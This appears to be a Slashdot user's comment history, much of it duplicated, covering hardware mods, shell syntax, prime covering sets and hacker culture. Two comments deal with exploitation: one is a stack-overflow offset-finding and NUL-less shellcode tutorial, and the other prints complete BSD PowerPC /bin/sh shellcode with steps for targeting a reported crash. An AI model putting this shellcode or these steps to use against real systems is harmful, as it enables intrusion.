Are you sure you mean uterus? The photo of it split apart had the twisted wires giving hints of a kind of pelvic shape, and maybe there was a kind of two-thighs/vulva proporioned 'gap' in between the drums. However, I'm having a hard time trying to get a uterus into any of the pictures.
On the same day as a Finn uses an industrial cooler unit to take his 3.2GHz PC (erm, collection of bits more like) to 4.8GHz via the medium of -100C temperatures.
Is this a Japan/Finland difference, or a Mac/PC user difference?
Beth is often having com files dedicated to her, so there's most likely more than one beth.com. However, the ASCII.com files guru is Herbert, so at least that part of the search was correct and unambiguous, and the first hit you list is the one I remembered. (Although I remember the third one, the blocked link one, too now, it made me feel quite sick after staring at the screen for a couple of minutes!)
And seeing that Herbert post again after I realised what would be a better search term: "@echo off" as all of his batch files begin with that line. Here are some more:
Here's an ASCII program that he uses to ASCII-fy other programs (complete with source too, so you can ASCII-fy your own arbitrary code!) http://groups.google.com/groups?hl=en&lr=& ie=UTF-8 &oe=utf-8&selm=3CFFE133.9870ABAD%40unibwm. de
Here's a useful text search/replace program: http://groups.google.com/groups?hl=en&lr =&ie=UTF-8 &oe=utf-8&selm=3D16DD47.E7B409CD%40unibwm. de
Here he's being a little naughty, by the looks of things: http://groups.google.com/groups?hl=en&lr= &ie=UTF-8 &oe=utf-8&selm=3E12B526.B0442AF2%40unibwm.de&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3Dutf- 8%26q%3D%2522%2540echo%2Boff%2522%2Bgroup%253Aalt. lang.asm%26btnG%3DGoogle%2BSearch
No idea what these are: http://groups.google.com/groups?hl=en&lr=&ie =UTF-8 &oe=utf-8&selm=3E26D3B9.418F602%40unibwm.de&prev=/ groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3Dutf-8 %26q%3D%2522%2540echo%2Boff%2522%2Bgroup%253Aalt.l ang.asm%26btnG%3DGoogle%2BSearch http://groups.go ogle.com/groups?hl=en&lr=&ie=UTF-8 &oe=utf-8&selm=3F56D877.21190F72%40unibwm. de
However, you get the idea - once you can create a small decoder just in ASCII bytes, then you can create more complicated programs on the fly. From what Herbert said in one of those posts, Laura Fairhead also has such an ASCII-fying engine. The famous Terje Mathison also has one, which he was telling us about only very recently (either alt.lang.asm or comp.lang.asm.x86).
Thanks for that extra tidbit. The quantity of hoop-jumping in that shellcode was quite minimal, and you've mostly explained why that was possible. However, even the PPC linux equivalent wasn't much longer. I think that the DEC Alpha and Sparc shellcodes that I've seen have been the most contrived. (I saw one where almost every instruction needed to be modified!)
C uses '\0' to delimit strings. Therefore a strcat will not go past the first '\0' in the shellcode (or whatever exploit it is you're trying to run).
So, if the code you want to run needs '\0's in it it must build those values on the fly. (e.g. subtract any value from itself and you instantly have a register loaded with 4 zeroes.) If you need opcodes that have 0 somewhere in them, then you need to self-modify, or you need to find a way to write what you want without using such opcodes. Most people go for the former.
That's all there is to being NUL-less. It's easy on x86, but slightly more challenging on fixed-length opcode machines (RISCs and VLIWs). Similarly, avoiding just '\0' is pretty easy - the real skill is from avoiding anything but [a-zA-Z0-9] such that you can pass some input sanitisers. (See posts by Herbert Kleebauer on alt.lang.asm for examples of ascii-only executables (one was called 'beth.com' IIRC, google should find it).)
To calculate the jump, just work out which of the 512 'A's are the 4 that you can see in the debugger stack trace. It's easiest to work this out by not having every character in the overflowing string being the same character. That's why I suggest 'abcdef...' If you now see the backtrace as containing 0x66676869 then you know it was one of your 'fghi's that you're now looking at. However you don't know which one yet, so try again with a different repeated string with a different length, and 'triangulate'. Or simply use a single probe with a string that doesn't repeat, such as "aaabacad....azbabbbcbd....bzcacbcccd..." Anyway, that tells you where in the string you need to put the address that you want to jump to. The next problem is working out what that address should be. This you can get from the debugger.
Read Aleph One's "smashing the stack for fun and profit" for more info. Once you can do it on one architecture, you'll be equipped to do it pretty much on all of them.
"Note that Monad scripts can actually be written in pretty much any.NET language, such as C# or JScript."
In that case it's not a scripting language at all, it's simply an API and/or compatability layers for such an API?
".ppt"
The information is so important that they want to hide it in fluff, eh? However, I found what I believe to be the same pressentation here: http://www.vikk.org/ms_cli/chuba79_slideshow/ and if so - it's an abomination. The quantity of boilerplate means that noone in their right mind will every use it.
Mac users, sorry, Mac zealots, are _great_! They have a magic instant wind-up button that's sooo easy to press.
I dearly love the POWER architecture, and so think the G5 is fantastic, and I foolishly boobed when asking a G5-owning friend to compile a Mac version of some of my code so that I could grab a benchmark, and be able to claim even greater portability of my code. My boob - to press the button.
The _one_ button. Have you worked out which one that is yet?
Hear, hear. I've only read a few things of his (typically via slashdot stories), but I've been amazed at the number of times he's promoted Microsoft and their way of doing things even if it's patently obvious to the outsider that either their particular methodology was not the source of their success, or that they didn't actually have any success in the direction he claimed. Usually the latter, or the former where the real reasons were monopolistic business practices.
Out of Tog, Sporksky, and ESR, only Tog manages to be detached enough to be believable (or instead of 'detached' should I say he's right often enough with what could be considered universal truths, that aren't just Mac specific). However, all three are over-inflated IMHO. (Gettys not much better but keeps a lower profile). Some 'spokespeople' however, I think do represent their cases very well. Stroustrup and Berners-Lee, for example. But these are even lower-profile.
Yeah, but if it was game of minesweeper that was being programmed. At least three of your hires are going to be sitting around twiddling their thumbs.
I'd just hire a Perl/Tk or Tcl/Tk hacker, and feed him enough coke and pizza to last him the single afternoon that it will take him to finish the task.
You'll be over-budget, and I'll be putting my feet up "testing" the program the next day.
It doesn't look like csh, it looks more like perl. In csh, $p would expand to the value of the scalar variable p. Just because it's got an '=' sign doesn't mean it's an assignment.
> set p=/bin/ls > $p = 2/bin/ls: =: No such file or directory/bin/ls: 2: No such file or directory > touch = > touch 2 > set p=/bin/ls > $p = 2 2 =
There are some very good technical reasons why csh should be avoided, but aesthetics isn't really one of them. Reasons such as a fundamental inability to express certain useful concepts (such as independent piping of stdout and stderr). Similarly, if monad is supposed to be a shell scripting language it too should be avoided as the above indicates that it seems funadamentally unable to run a program defined by a variable. That's a far more fundamental flaw than csh's stderr problems. (Yes, there's probably a way round it, but if they'd only stuck to common shell langauge syntactic conventions there wouldn't have been a hole to work around.)
WTF has the far end's OS got to do with script kiddieness? Are you getting confused by the fact that there are two parties involved in such an attack -- the script kiddie and the victim? DO you think that these two parties need to be running the same OS? Do you find yourself accidentally hacking or DoSsing your own system sometimes?
The level of ignorance that you display is part of the problem.
Maybe, maybe not, depending on whether you admit the concept of infinite covering sets. Any other proof strategy of which you speak could quite probably be reworked just an infinite covering set. (As if it were constructive, for example, it would lead/immediately/ to an (infinite number of) infinite covering set(s).)
Not everyone espouses infinite covering sets as a possibility, so if you don't you're certainly not on your own.
My personal view is that pretty much everything to do with prime densities that is based on the existance or non-existance of factors follows the heuristics (such as k-tuplet densities and the "C_n" figures for various cyclotomic types, but _not_ wieferich/SSW primes), and the heuristics point to Seventeen-or-Bust running out of numbers to test by the time they've reached n=10^12 or similar. Which makes me definitely an infinite covering set sceptic.
"I don't see any demonstration (or even any indication) that this is exploitable."
Then what the fuck is "#2 0x41414141 in ?? ()"?
To me, that looks like user data in the stack frame. To me, that means that an arbitrary jump can be executed. To me, that means that arbitrary NUL-less code can be executed.
And the chances of there existing NUL-less BSD PPC shell-code are what, you ask?
All someone's got to do is calculate the offset for the overwritten return stack to contain such that it calls the above code. That could be calculated with just 2 more probes with perl - use 'abcdefghijklmnopqrstuvwxyz' x 20 and 'abcdefghijklmnopqrstuvwxyz123456789' x 16 and tell me the values read off the stack.
If anything you should be thankful that 'Max' didn't publish real live exploit code, as then the script kiddies would be doing their best to run it already. At least this way they need to still fill in the gaps. Gaps that unfortunately I've just had to explain on a very public forum because a Mac user had his head in the clouds.
You can construct an infinite number of provable sierpinski numbers through finding what are called "covering sets". These are sets of factors that repeat in the sequence k*2^n+1, with fixed k, and variable n. e.g. as long as k is not divisible by 3, then half of the values k*2^n+1 will be divisible by 3. For some k it will be the even n's, for other k it will be the odd n's. Either way, you've already covered half the possibilities with a known factor. Fill in 1/4 of the values by ensuring that 5 divides half of the ones not divisible by 3, hey presto - only 1/4 now remain. 17 can remove 1/8, leaving 1/8. 65537 can remove 1/16, leaving 1/16. Between them, 241, 97 and 673 can remove 1/16 (as they can each remove 1/48). That's it - there's your covering set {3,5,17,65537,241,97,673}. Finding which k values actually use this covering set is an exercise in using the Chinese Remainder Theorem. (note - may be errors in the above, I did it off the top of my head, but looks right.)
If you can't find a covering set, and for the remaining 11 numbers that looks most likely, then you're right, you can't know for sure that there is no prime.
"It's called competition, and it's been proven, that when coupled with the right amount of cooperation, to be very good at advancing things."
The giraffe and the crab are a product of competition. They consider themselves the most advanced long-necked-thing and walks-sideways-thing in the world.
Want an IT example? The browser with the blink tag was more advanced than the browser that came before it.
Bullshit. Back in the 60s that word may have meant someone working obsessively on systems, but that included illegal entry to other people's communications networks.
Or does 2600Hz not exist in your spectrum? Take that soft cheese out of your ears in which case.
Phone phreakers were hackers. Phone phreakers broke the law. Full stop.
"In 1994 it was hard to find any good free porn sites."
Hahah, someone else who never heard of FSP! (a "push" version of FTP) There were plenty of FSP sites with gigs of porn. And that was when gigs was a lot.
Of course, abpe and asp were a continuous stream of porn too.
Nah, inodes are a red herring, they're not user-visible, which filenames are. Symbolic links are far closer, they even reside in directory-space, like the VFAT virtual names.
Slashdot Mirror
So the alternative to running as Admin is running as Admin?
Erm? Shome mishtake, shurely?
YAW.
1) Now
2) Never
YAW.
Which bit of my post indicated that I had "a problem" with the case mod?
Are you sure you mean uterus?
The photo of it split apart had the twisted wires giving hints of a kind of pelvic shape, and maybe there was a kind of two-thighs/vulva proporioned 'gap' in between the drums. However, I'm having a hard time trying to get a uterus into any of the pictures.
Phil
On the same day as a Finn uses an industrial cooler unit to take his 3.2GHz PC (erm, collection of bits more like) to 4.8GHz via the medium of -100C temperatures.
Is this a Japan/Finland difference, or a Mac/PC user difference?
YAW.
Liquid paper and accidents are often found near each other, I find.
YAW.
Don't do this if they're sandblasting your building.
One PSU & one CD-R drive are now sitting somewhere in a Finnish landfill because of grit.
YAW.
Beth is often having com files dedicated to her, so there's most likely more than one beth.com. However, the ASCII .com files guru is Herbert, so at least that part of the search was correct and unambiguous, and the first hit you list is the one I remembered.
& ie=UTF-8 &oe=utf-8&selm=3CFFE133.9870ABAD%40unibwm. de
r =&ie=UTF-8 &oe=utf-8&selm=3D16DD47.E7B409CD%40unibwm. de
= &ie=UTF-8 &oe=utf-8&selm=3E12B526.B0442AF2%40unibwm.de&prev= /groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3Dutf- 8%26q%3D%2522%2540echo%2Boff%2522%2Bgroup%253Aalt. lang.asm%26btnG%3DGoogle%2BSearch
e =UTF-8 &oe=utf-8&selm=3E26D3B9.418F602%40unibwm.de&prev=/ groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3Dutf-8 %26q%3D%2522%2540echo%2Boff%2522%2Bgroup%253Aalt.l ang.asm%26btnG%3DGoogle%2BSearcho ogle.com/groups?hl=en&lr=&ie=UTF-8 &oe=utf-8&selm=3F56D877.21190F72%40unibwm. de
(Although I remember the third one, the blocked link one, too now, it made me feel quite sick after staring at the screen for a couple of minutes!)
And seeing that Herbert post again after I realised what would be a better search term: "@echo off" as all of his batch files begin with that line. Here are some more:
Here's an ASCII program that he uses to ASCII-fy other programs (complete with source too, so you can ASCII-fy your own arbitrary code!)
http://groups.google.com/groups?hl=en&lr=
Here's a useful text search/replace program:
http://groups.google.com/groups?hl=en&l
Here he's being a little naughty, by the looks of things:
http://groups.google.com/groups?hl=en&lr
No idea what these are:
http://groups.google.com/groups?hl=en&lr=&i
http://groups.g
However, you get the idea - once you can create a small decoder just in ASCII bytes, then you can create more complicated programs on the fly. From what Herbert said in one of those posts, Laura Fairhead also has such an ASCII-fying engine. The famous Terje Mathison also has one, which he was telling us about only very recently (either alt.lang.asm or comp.lang.asm.x86).
YAW.
Thanks for that extra tidbit. The quantity of hoop-jumping in that shellcode was quite minimal, and you've mostly explained why that was possible. However, even the PPC linux equivalent wasn't much longer.
I think that the DEC Alpha and Sparc shellcodes that I've seen have been the most contrived. (I saw one where almost every instruction needed to be modified!)
YAW.
NUL is '\0' the byte valued 0.
, that tells you where in the string you need to put the address that you want to jump to. The next problem is working out what that address should be. This you can get from the debugger.
C uses '\0' to delimit strings. Therefore a strcat will not go past the first '\0' in the shellcode (or whatever exploit it is you're trying to run).
So, if the code you want to run needs '\0's in it it must build those values on the fly. (e.g. subtract any value from itself and you instantly have a register loaded with 4 zeroes.) If you need opcodes that have 0 somewhere in them, then you need to self-modify, or you need to find a way to write what you want without using such opcodes. Most people go for the former.
That's all there is to being NUL-less. It's easy on x86, but slightly more challenging on fixed-length opcode machines (RISCs and VLIWs). Similarly, avoiding just '\0' is pretty easy - the real skill is from avoiding anything but [a-zA-Z0-9] such that you can pass some input sanitisers. (See posts by Herbert Kleebauer on alt.lang.asm for examples of ascii-only executables (one was called 'beth.com' IIRC, google should find it).)
To calculate the jump, just work out which of the 512 'A's are the 4 that you can see in the debugger stack trace. It's easiest to work this out by not having every character in the overflowing string being the same character. That's why I suggest 'abcdef...'
If you now see the backtrace as containing 0x66676869 then you know it was one of your 'fghi's that you're now looking at. However you don't know which one yet, so try again with a different repeated string with a different length, and 'triangulate'. Or simply use a single probe with a string that doesn't repeat, such as "aaabacad....azbabbbcbd....bzcacbcccd..."
Anyway
Read Aleph One's "smashing the stack for fun and profit" for more info. Once you can do it on one architecture, you'll be equipped to do it pretty much on all of them.
Have fun, but remember to practice safe hex.
YAW.
"Note that Monad scripts can actually be written in pretty much any .NET language, such as C# or JScript."
In that case it's not a scripting language at all, it's simply an API and/or compatability layers for such an API?
".ppt"
The information is so important that they want to hide it in fluff, eh? However, I found what I believe to be the same pressentation here: http://www.vikk.org/ms_cli/chuba79_slideshow/ and if so - it's an abomination. The quantity of boilerplate means that noone in their right mind will every use it.
YAW.
Mac users, sorry, Mac zealots, are _great_! They have a magic instant wind-up button that's sooo easy to press.
I dearly love the POWER architecture, and so think the G5 is fantastic, and I foolishly boobed when asking a G5-owning friend to compile a Mac version of some of my code so that I could grab a benchmark, and be able to claim even greater portability of my code. My boob - to press the button.
The _one_ button. Have you worked out which one that is yet?
He hasn't spoken to me since!
YAW.
Hear, hear.
I've only read a few things of his (typically via slashdot stories), but I've been amazed at the number of times he's promoted Microsoft and their way of doing things even if it's patently obvious to the outsider that either their particular methodology was not the source of their success, or that they didn't actually have any success in the direction he claimed. Usually the latter, or the former where the real reasons were monopolistic business practices.
Out of Tog, Sporksky, and ESR, only Tog manages to be detached enough to be believable (or instead of 'detached' should I say he's right often enough with what could be considered universal truths, that aren't just Mac specific). However, all three are over-inflated IMHO.
(Gettys not much better but keeps a lower profile).
Some 'spokespeople' however, I think do represent their cases very well. Stroustrup and Berners-Lee, for example. But these are even lower-profile.
YAW.
Yeah, but if it was game of minesweeper that was being programmed. At least three of your hires are going to be sitting around twiddling their thumbs.
I'd just hire a Perl/Tk or Tcl/Tk hacker, and feed him enough coke and pizza to last him the single afternoon that it will take him to finish the task.
You'll be over-budget, and I'll be putting my feet up "testing" the program the next day.
YAW.
It doesn't look like csh, it looks more like perl.
/bin/ls: =: No such file or directory /bin/ls: 2: No such file or directory
In csh, $p would expand to the value of the scalar variable p.
Just because it's got an '=' sign doesn't mean it's an assignment.
> set p=/bin/ls
> $p = 2
> touch =
> touch 2
> set p=/bin/ls
> $p = 2
2 =
There are some very good technical reasons why csh should be avoided, but aesthetics isn't really one of them. Reasons such as a fundamental inability to express certain useful concepts (such as independent piping of stdout and stderr). Similarly, if monad is supposed to be a shell scripting language it too should be avoided
as the above indicates that it seems funadamentally unable to run a program defined by a variable. That's a far more fundamental flaw than csh's stderr problems. (Yes, there's probably a way round it, but if they'd only stuck to common shell langauge syntactic conventions there wouldn't have been a hole to work around.)
YAW.
WTF has the far end's OS got to do with script kiddieness?
Are you getting confused by the fact that there are two parties involved in such an attack -- the script kiddie and the victim? DO you think that these two parties need to be running the same OS? Do you find yourself accidentally hacking or DoSsing your own system sometimes?
The level of ignorance that you display is part of the problem.
YAW.
Maybe, maybe not, depending on whether you admit the concept of infinite covering sets. Any other proof strategy of which you speak could quite probably be reworked just an infinite covering set. (As if it were constructive, for example, it would lead /immediately/ to an (infinite number of) infinite covering set(s).)
Not everyone espouses infinite covering sets as a possibility, so if you don't you're certainly not on your own.
My personal view is that pretty much everything to do with prime densities that is based on the existance or non-existance of factors follows the heuristics (such as k-tuplet densities and the "C_n" figures for various cyclotomic types, but _not_ wieferich/SSW primes), and the heuristics point to Seventeen-or-Bust running out of numbers to test by the time they've reached n=10^12 or similar. Which makes me definitely an infinite covering set sceptic.
So yes, my bias was coming through.
YAW.
"I don't see any demonstration (or even any indication) that this is exploitable."
Then what the fuck is "#2 0x41414141 in ?? ()"?
To me, that looks like user data in the stack frame.
To me, that means that an arbitrary jump can be executed.
To me, that means that arbitrary NUL-less code can be executed.
And the chances of there existing NUL-less BSD PPC shell-code are what, you ask?
Here's your answer -
0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6,
0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
0x7CC419AE, 0x7C8429D6, 0x7C842214, 0x7C043A14,
0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214,
0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78,
0x44FFFF02, 0x4BFFFFA9, 0x2F62696E, 0x2F73685A,
0xFFFFFFFF, 0xFFFFFFFF
All someone's got to do is calculate the offset for the overwritten return stack to contain such that it calls the above code. That could be calculated with just 2 more probes with perl - use 'abcdefghijklmnopqrstuvwxyz' x 20 and 'abcdefghijklmnopqrstuvwxyz123456789' x 16
and tell me the values read off the stack.
If anything you should be thankful that 'Max' didn't publish real live exploit code, as then the script kiddies would be doing their best to run it already. At least this way they need to still fill in the gaps. Gaps that unfortunately I've just had to explain on a very public forum because a Mac user had his head in the clouds.
YAW.
You can construct an infinite number of provable sierpinski numbers through finding what are called "covering sets". These are sets of factors that repeat in the sequence k*2^n+1, with fixed k, and variable n.
e.g. as long as k is not divisible by 3, then half of the values k*2^n+1 will be divisible by 3. For some k it will be the even n's, for other k it will be the odd n's. Either way, you've already covered half the possibilities with a known factor. Fill in 1/4 of the values by ensuring that 5 divides half of the ones not divisible by 3, hey presto - only 1/4 now remain. 17 can remove 1/8, leaving 1/8. 65537 can remove 1/16, leaving 1/16. Between them, 241, 97 and 673 can remove 1/16 (as they can each remove 1/48). That's it - there's your covering set {3,5,17,65537,241,97,673}.
Finding which k values actually use this covering set is an exercise in using the Chinese Remainder Theorem.
(note - may be errors in the above, I did it off the top of my head, but looks right.)
If you can't find a covering set, and for the remaining 11 numbers that looks most likely, then you're right, you can't know for sure that there is no prime.
YAW.
"It's called competition, and it's been proven, that when coupled with the right amount of cooperation, to be very good at advancing things."
The giraffe and the crab are a product of competition.
They consider themselves the most advanced long-necked-thing and walks-sideways-thing in the world.
Want an IT example? The browser with the blink tag was more advanced than the browser that came before it.
YAW.
Bullshit. Back in the 60s that word may have meant someone working obsessively on systems, but that included illegal entry to other people's communications networks.
Or does 2600Hz not exist in your spectrum? Take that soft cheese out of your ears in which case.
Phone phreakers were hackers. Phone phreakers broke the law.
Full stop.
YAW.
Why was everyone using 300 baud?
1200/75 half duplex made so much more sense.
Or at least to me it did. 75 is faster than my
typing speed, after all
ZX Spectrum + "Prism" modem, IIRC. Bliss.
YAW.
"In 1994 it was hard to find any good free porn sites."
Hahah, someone else who never heard of FSP! (a "push" version of FTP) There were plenty of FSP sites with gigs of porn. And that was when gigs was a lot.
Of course, abpe and asp were a continuous stream of porn too.
Or so a friend told me, eheh.
YAW.
Nah, inodes are a red herring, they're not user-visible, which filenames are. Symbolic links are far closer, they even reside in directory-space, like the VFAT virtual names.
YAW.
Score:0, Flamebait
Having your head in the sand doesn't make you more elite.
Grow up.